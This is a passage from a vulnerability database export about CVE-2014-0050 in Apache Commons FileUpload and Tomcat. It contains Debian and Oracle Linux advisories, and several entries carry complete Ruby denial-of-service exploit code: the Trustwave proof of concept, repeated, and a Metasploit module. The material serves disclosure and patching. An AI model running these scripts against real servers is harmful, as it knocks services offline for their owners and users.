"libcommons-fileupload-java_1.2.2-1+deb6u2_all.deb", "packageName": "libcommons-fileupload-java", "operator": "lt"}, {"OS": "Debian", "OSVersion": "7", "packageVersion": "1.2.2-1+deb7u2", "arch": "all", "packageFilename": "libcommons-fileupload-java_1.2.2-1+deb7u2_all.deb", "packageName": "libcommons-fileupload-java", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.2.2-1+deb6u2", "arch": "all", "packageFilename": "libcommons-fileupload-java-doc_1.2.2-1+deb6u2_all.deb", "packageName": "libcommons-fileupload-java-doc", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2856-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nFebruary 07, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libcommons-fileupload-java\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2014-0050\n\nIt was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2014-02-07T22:59:26", "title": "[SECURITY] [DSA 2856-1] libcommons-fileupload-java security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:50:34", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-07T22:59:26", "id": "DEBIAN:DSA-2856-1:D2DA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00026.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-18T13:49:21", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "7.0.28-4+deb7u1", "arch": "all", "packageFilename": "tomcat7_7.0.28-4+deb7u1_all.deb", "packageName": "tomcat7", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2897-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nApril 08, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tomcat7\nCVE ID : CVE-2013-2067 CVE-2013-2071 CVE-2013-4286 CVE-2013-4322 \n CVE-2014-0050\n\nMultiple security issues were found in the Tomcat servlet and JSP engine:\n\nCVE-2013-2067\n\n FORM authentication associates the most recent request requiring \n authentication with the current session. By repeatedly sending a request \n for an authenticated resource while the victim is completing the login \n form, an attacker could inject a request that would be executed using the \n victim's credentials.\n\nCVE-2013-2071\n\n A runtime exception in AsyncListener.onComplete() prevents the request from \n being recycled. This may expose elements of a previous request to a current \n request.\n\nCVE-2013-4286\n\n Reject requests with multiple content-length headers or with a content-length \n header when chunked encoding is being used.\n\nCVE-2013-4322\n\n When processing a request submitted using the chunked transfer encoding, \n Tomcat ignored but did not limit any extensions that were included. This allows \n a client to perform a limited denial of service. by streaming an unlimited amount \n of data to the server.\n\nCVE-2014-0050\n\n Multipart requests with a malformed Content-Type header could trigger an \n infinite loop causing a denial of service.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 7.0.28-4+deb7u1.\n\nFor the testing distribution (jessie), these problems have been fixed in\nversion 7.0.52-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 7.0.52-1.\n\nWe recommend that you upgrade your tomcat7 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2014-04-08T18:25:42", "title": "[SECURITY] [DSA 2897-1] tomcat7 security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:21", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-2071", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-2067", "CVE-2013-4286"], "modified": "2014-04-08T18:25:42", "id": "DEBIAN:DSA-2897-1:13B38", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2014/msg00073.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T16:36:25", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments_done": [], "references": [], "description": "No description provided by source.", "reporter": "Root", "published": "2014-07-01T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84935", "id": "SSV:84935", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on("-h","--help","help") do\r\n \tputs ""\r\n puts "#################################################################################"\r\n\tputs "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n\tputs "# #"\r\n\tputs "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n\tputs "# This is a Proof of Concept code that was created for the sole purpose #"\r\n\tputs "# of assisting system administrators in evaluating whether or not #"\r\n\tputs "# their applications are vulnerable to this issue. #"\r\n\tputs "# #"\r\n\tputs "# Please use responsibly. #"\r\n\tputs "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = ""\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs ""\r\n\tputs "ERROR: Invalid URL was entered #{options[:url]}"\r\n\tputs ""\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs ""\r\n\t\tputs "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n\t\tputs ""\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs "Request Launched"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme=="https"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n\treq.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n\treq.body = "b"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs "Timeout - continuing DoS..."\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84935", "status": "cve,poc"}, {"lastseen": "2017-11-19T17:35:36", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "BUGTRAQ ID: 65400\r\nCVE(CAN) ID: CVE-2014-0050\r\n\r\nApache Commons FileUpload\u8f6f\u4ef6\u5305\u53ef\u4ee5\u5411\u5c0f\u670d\u52a1\u7a0b\u5e8f\u548cWeb\u5e94\u7528\u6dfb\u52a0\u9ad8\u6027\u80fd\u7684\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u3002Apache Tomcat\u662f\u4e00\u4e2a\u6d41\u884c\u7684\u5f00\u653e\u6e90\u7801\u7684JSP\u5e94\u7528\u670d\u52a1\u5668\u7a0b\u5e8f\u3002\r\n\r\nApache\u5171\u4eab\u6587\u4ef6\u4e0a\u4f20\u5b58\u5728\u89e3\u6790\u7578\u5f62\u7684Content-Type\u5934\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f7f\u7528\u7279\u5236\u7684\u8bf7\u6c42\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7a0b\u5e8f\u5d29\u6e83\u3002\n0\nCommons FileUpload 1.0-1.3\r\nApache Tomcat 8.0.0-RC1-8.0.1\r\nApache Tomcat 7.0.0-7.0.50\r\nApache Tomcat 6\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache\r\n-----\r\n\u5347\u7ea7\u5230Commons FileUpload 1.3.1, \u6216\u8005Tomcat 8.0.2, 7.0.51\u53ca\u66f4\u9ad8\u7248\u672c\u4fee\u590d\u6b64\u6f0f\u6d1e\uff1a\r\n\r\nhttp://commons.apache.org/", "reporter": "Root", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "Apache Commons FileUpload/Apache Tomcat\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61443", "id": "SSV:61443", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on("-h","--help","help") do\r\n puts ""\r\n puts "#################################################################################"\r\n puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n puts "# #"\r\n puts "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n puts "# This is a Proof of Concept code that was created for the sole purpose #"\r\n puts "# of assisting system administrators in evaluating whether or not #"\r\n puts "# their applications are vulnerable to this issue. #"\r\n puts "# #"\r\n puts "# Please use responsibly. #"\r\n puts "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = ""\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts ""\r\n puts "ERROR: Invalid URL was entered #{options[:url]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts ""\r\n puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts "Request Launched"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme=="https"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n req.body = "b"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts "Timeout - continuing DoS..."\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61443", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "poc,details"}], "metasploit": [{"lastseen": "2018-09-26T19:34:31", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "references": [], "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0 through 1.3 via a specially crafted Content-Type header. Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50 and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also uses Commons FileUpload as part of the Manager application.", "reporter": "Rapid7", "published": "2014-02-22T13:56:59", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb", "type": "metasploit", "title": "Apache Commons FileUpload and Apache Tomcat DoS", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-07-24T13:26:21", "metasploitReliability": "Normal", "id": "MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',\n 'Description' => %q{\n This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.\n },\n 'Author' =>\n [\n 'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.\n 'ribeirux' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-0050'],\n ['URL', 'http://tomcat.apache.org/security-8.html'],\n ['URL', 'http://tomcat.apache.org/security-7.html']\n ],\n 'DisclosureDate' => 'Feb 6 2014'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, \"The request URI\", '/']),\n OptInt.new('RLIMIT', [ true, \"Number of requests to send\",50])\n ])\n end\n\n def run\n boundary = \"0\"*4092\n opts = {\n 'method' => \"POST\",\n 'uri' => normalize_uri(target_uri.to_s),\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => \"#{boundary}00000\",\n 'headers' => {\n 'Accept' => '*/*'\n }\n }\n\n # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby\n # This should be rewritten with 1.upto() or Enumerable#each or\n # something\n for x in 1..datastore['RLIMIT']\n print_status(\"Sending request #{x} to #{peer}\")\n begin\n c = connect\n r = c.request_cgi(opts)\n c.send_request(r)\n # Don't wait for a response\n rescue ::Rex::ConnectionError => exception\n print_error(\"Unable to connect: '#{exception.message}'\")\n return\n ensure\n disconnect(c) if c\n end\n end\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb"}], "zdt": [{"lastseen": "2018-01-04T07:03:17", "references": [], "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "reporter": "Trustwave's Spide.", "published": "2014-02-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "type": "zdt", "title": "Apache Commons FileUpload and Apache Tomcat Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "1337DAY-ID-21887", "href": "https://0day.today/exploit/description/21887", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n puts \"\"\r\n puts \"#################################################################################\"\r\n puts \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n puts \"# #\"\r\n puts \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n puts \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n puts \"# of assisting system administrators in evaluating whether or not #\"\r\n puts \"# their applications are vulnerable to this issue. #\"\r\n puts \"# #\"\r\n puts \"# Please use responsibly. #\"\r\n puts \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = \"\"\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts \"\"\r\n puts \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts \"\"\r\n puts \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts \"Request Launched\"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme==\"https\"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n req.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n req.body = \"b\"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts \"Timeout - continuing DoS...\"\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21887"}], "oraclelinux": [{"lastseen": "2018-08-31T01:46:09", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-admin-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-admin-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-admin-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "src", "packageFilename": "tomcat6-6.0.24-64.el6_5.src.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "src", "packageFilename": "tomcat6-6.0.24-64.el6_5.src.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-el-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-el-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-el-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-jsp-2.1-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-jsp-2.1-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-docs-webapp-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-docs-webapp-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-docs-webapp", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-lib-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-lib-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-lib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-javadoc-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-javadoc-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-webapps-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "6.0.24-64.el6_5", "arch": "noarch", "packageFilename": "tomcat6-servlet-2.5-api-6.0.24-64.el6_5.noarch.rpm", "packageName": "tomcat6-servlet-2.5-api", "operator": "lt"}], "description": "[0:6.0.24-64]\n- Resolves: CVE-2014-0050\n[0:6.0.24-63]\n- Resolves: CVE-2013-4322 CVE-2013-4286", "edition": 3, "reporter": "Oracle", "published": "2014-04-23T00:00:00", "title": "tomcat6 security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "modified": "2014-04-23T00:00:00", "id": "ELSA-2014-0429", "href": "http://linux.oracle.com/errata/ELSA-2014-0429.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T01:48:42", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-el-2.2-api-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-el-2.2-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-javadoc-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-javadoc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-lib-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-lib", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-jsp-2.2-api-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-jsp-2.2-api", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "noarch", "packageFilename": "tomcat-webapps-7.0.42-5.el7_0.noarch.rpm", "packageName": "tomcat-webapps", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "7.0.42-5.el7_0", "arch": "src", "packageFilename": "tomcat-7.0.42-5.el7_0.src.rpm", "packageName": "tomcat", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", 